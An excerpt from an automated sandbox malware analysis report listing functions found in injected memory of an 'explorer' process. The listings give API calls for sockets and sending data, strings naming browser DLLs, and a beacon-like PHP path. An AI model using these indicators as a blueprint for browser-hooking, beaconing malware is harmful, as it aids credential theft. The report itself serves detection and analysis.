                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: strtol.MSVCRT ref: 0DF273D6
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF292CD
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcpyA.KERNEL32 ref: 0DF270CE
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF270DF
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF270F3
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF27107
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF27118
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF2712C
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF2714A
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: wsprintfA.USER32 ref: 0DF27162
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF27176
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF2718A
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcatA.KERNEL32 ref: 0DF271C6
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: WSAStartup.WS2_32 ref: 0DF271D6
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: socket.WS2_32 ref: 0DF271F2
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: gethostbyname.WS2_32 ref: 0DF27209
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: memcpy.MSVCRT ref: 0DF27229
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: htons.WS2_32 ref: 0DF27238
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: connect.WS2_32 ref: 0DF2724F
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrlenA.KERNEL32 ref: 0DF27265
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: send.WS2_32 ref: 0DF2727B
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0DF2936C
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0DF2937A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                                  • String ID: /VzCAHn.php?443320E440F81953448019$443320E440F81953448019
                                                                                                                                                                                                                                  • API String ID: 3667244998-3231779537
                                                                                                                                                                                                                                  • Opcode ID: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                                  • Instruction ID: 519cdfb64ccf12b706a96fb4b498125957892eacf2cffc7a47e9072adc6ccbcf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D514931608B4281EB10DBA5F85037A73B5FB99B84F508127DA8E83B64DFBCC549CB60
                                                                                                                                                                                                                                  Function 08A1F0F5 Relevance: 18.1, APIs: 12, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_lock$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3029504548-0
                                                                                                                                                                                                                                  • Opcode ID: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                                  • Instruction ID: 7eb7083f3e5ea6251bb6506b334ed6927001cd88a525d38c4d4707c70896dabc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41313E3C31994A8FDFBDFB69D1A0B7D7292EF89352F88042D880AC7E49CE20D4418751
                                                                                                                                                                                                                                  Function 0AE4F0F5 Relevance: 18.1, APIs: 12, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_lock$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3029504548-0
                                                                                                                                                                                                                                  • Opcode ID: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                                  • Instruction ID: 9ae27745b64905e413536799ab7aaec3147b7b24b0e8453dda0a1312f0e202a6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A831123462590A4EDFADFF6CF0A0B7D329AFF99A05F89242DC40AC7646CF14D4518B51
                                                                                                                                                                                                                                  Function 0B30F0F5 Relevance: 18.1, APIs: 12, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_lock$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3029504548-0
                                                                                                                                                                                                                                  • Opcode ID: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                                  • Instruction ID: 989b8547a2cefd51869b2a171aad4d26689d0c7ca55002e09f95279511690f05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24da189340a75204b4623750191f2d8847b2b021e4ce95673c6449e63a54cafc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75311A38625D0A8FDFBDFB6CC1B2B3D72A6EF99201FA4042D840AD72C9DE24D8418751
                                                                                                                                                                                                                                  Function 0DF3DED0 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4099253644-0
                                                                                                                                                                                                                                  • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction ID: 89d6eb495834707d7f3cf73024fdc815f194e894a5aa56e62e604e871fed94dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B631FB21615A4281EE14AFE9EC943743360EF84F94F4EC636DE5B06AA0EFBCC4948720
                                                                                                                                                                                                                                  Function 0E0E9730 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0EA070: RtlInitializeCriticalSection.NTDLL ref: 0E0EA0A1
                                                                                                                                                                                                                                    • Part of subcall function 0E0EA070: RtlInitializeCriticalSection.NTDLL ref: 0E0EA0AE
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 0E0E97D0
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 0E0E97EA
                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 0E0E980F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0E0E986A
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0E0E9873
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                                  • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                                  • API String ID: 308684148-2401417439
                                                                                                                                                                                                                                  • Opcode ID: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                                  • Instruction ID: 93187a1702fd9c926d5b6631f106483a16ba71d53893abcaf18641f78e2a6b25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1517471314B85C9EA70DF52E8603DA63A5FBC8BC4FC84865DA8957B24EF78C949C740
                                                                                                                                                                                                                                  Function 0DF39730 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF3A070: RtlInitializeCriticalSection.NTDLL ref: 0DF3A0A1
                                                                                                                                                                                                                                    • Part of subcall function 0DF3A070: RtlInitializeCriticalSection.NTDLL ref: 0DF3A0AE
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 0DF397D0
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 0DF397EA
                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 0DF3980F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0DF3986A
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0DF39873
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                                  • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                                  • API String ID: 308684148-2401417439
                                                                                                                                                                                                                                  • Opcode ID: 794f7e930e3b4696333adc61535c8d6afee0dc4953acd4b971fb5ae35631caea
                                                                                                                                                                                                                                  • Instruction ID: 8e69f2debd6029fe9544f5f8e5dab13bb534cb1e45074ba3def4cbff771180a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 794f7e930e3b4696333adc61535c8d6afee0dc4953acd4b971fb5ae35631caea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09516331718B8685EA20DF99B8503BA7364F784BC4F8AC126DE4E47758DFB8C605CB50
                                                                                                                                                                                                                                  Function 10209730 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 1020A070: RtlInitializeCriticalSection.NTDLL ref: 1020A0A1
                                                                                                                                                                                                                                    • Part of subcall function 1020A070: RtlInitializeCriticalSection.NTDLL ref: 1020A0AE
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 102097D0
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 102097EA
                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 1020980F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 1020986A
                                                                                                                                                                                                                                  • free.MSVCRT ref: 10209873
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                                  • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                                  • API String ID: 308684148-2401417439
                                                                                                                                                                                                                                  • Opcode ID: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                                  • Instruction ID: 04e608b1f1653dfc352082e98687b5487c6b4c5189c7815cfe987d62704c76ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251BB72324B8685EB50CF51A8943DAA3A4F789BC4F944116EE8E4772CDFBCC659C740
                                                                                                                                                                                                                                  Function 0E0E58E0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1433255627-0
                                                                                                                                                                                                                                  • Opcode ID: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                                  • Instruction ID: b7f0c27b29cdd8d65d503b177e6a29da9fd1c62f0307f92eec27b9069eb27f8b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11516B76705B808AEB64DF16E85439A73A1FB8DBC8F444869DF4A53B18DF38C945CB04
                                                                                                                                                                                                                                  Function 0DF358E0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1433255627-0
                                                                                                                                                                                                                                  • Opcode ID: 40c48ae8ec2343bbb3b98df1a77e89d385d27f4f5d1111ebd434155fb02d25df
                                                                                                                                                                                                                                  • Instruction ID: a01f2b09780346635790cd2ff8a55deaa5652ba4d253dc4a988ea585396bb62d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40c48ae8ec2343bbb3b98df1a77e89d385d27f4f5d1111ebd434155fb02d25df
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78518D76308B8186EB24DF6AE84436A73A1FB89BC4F15802ADE4E47B58DF3CC554CB10
                                                                                                                                                                                                                                  Function 102058E0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1433255627-0
                                                                                                                                                                                                                                  • Opcode ID: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                                  • Instruction ID: 8266882d778b9b331b33257127dd238aad38cdf86ea9c0bd081073b0192aa524
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC518E76314B9486EB24CF16E89839AB361FB8CBC8F105525EE8A47B18DF7CC955CB00
                                                                                                                                                                                                                                  Function 0E0DF170 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3250796435-0
                                                                                                                                                                                                                                  • Opcode ID: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                                  • Instruction ID: 7f82eceb5ec0419a60f18fea6751ab2c4efee42e98520645ba5d8f163c1ac153
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D41BD36304B8286DB60CF66E85476A77A4FB88BD0F048525CE5E53B54EF7CC4898B10
                                                                                                                                                                                                                                  Function 101FF170 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3250796435-0
                                                                                                                                                                                                                                  • Opcode ID: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                                  • Instruction ID: e54e8467a238e5a317dbb3968cc04e005e36fe88ca8deb21ae4114c65d8fbb29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A419F36304B4586DB50CF66E958B9A77A4FB88BD0F014129DE9E43758EF7CD189CB10
                                                                                                                                                                                                                                  Function 0E0DEF20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0DEDF0: GetWindowsDirectoryW.KERNEL32 ref: 0E0DEE43
                                                                                                                                                                                                                                    • Part of subcall function 0E0DEDF0: GetVolumeInformationW.KERNEL32 ref: 0E0DEE92
                                                                                                                                                                                                                                    • Part of subcall function 0E0DEDF0: wsprintfW.USER32 ref: 0E0DEEF4
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32 ref: 0E0DEF85
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0E0DEF95
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0E0DEFA3
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32 ref: 0E0DEFAE
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 0E0DEFBC
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0E0DEFCC
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0E0DEFDA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0E0DEFEA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                                  • Instruction ID: 47ce69ef98be8829b852652a18f7b022565aceb083322d54967e8cd07c514fba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50213872318B8286EB60DF61F85835D33A1FB89740F412835DA8E97B14EE79C569C704
                                                                                                                                                                                                                                  Function 101FEF20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 101FEDF0: GetWindowsDirectoryW.KERNEL32 ref: 101FEE43
                                                                                                                                                                                                                                    • Part of subcall function 101FEDF0: GetVolumeInformationW.KERNEL32 ref: 101FEE92
                                                                                                                                                                                                                                    • Part of subcall function 101FEDF0: wsprintfW.USER32 ref: 101FEEF4
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32 ref: 101FEF85
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 101FEF95
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 101FEFA3
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32 ref: 101FEFAE
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 101FEFBC
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 101FEFCC
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 101FEFDA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 101FEFEA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
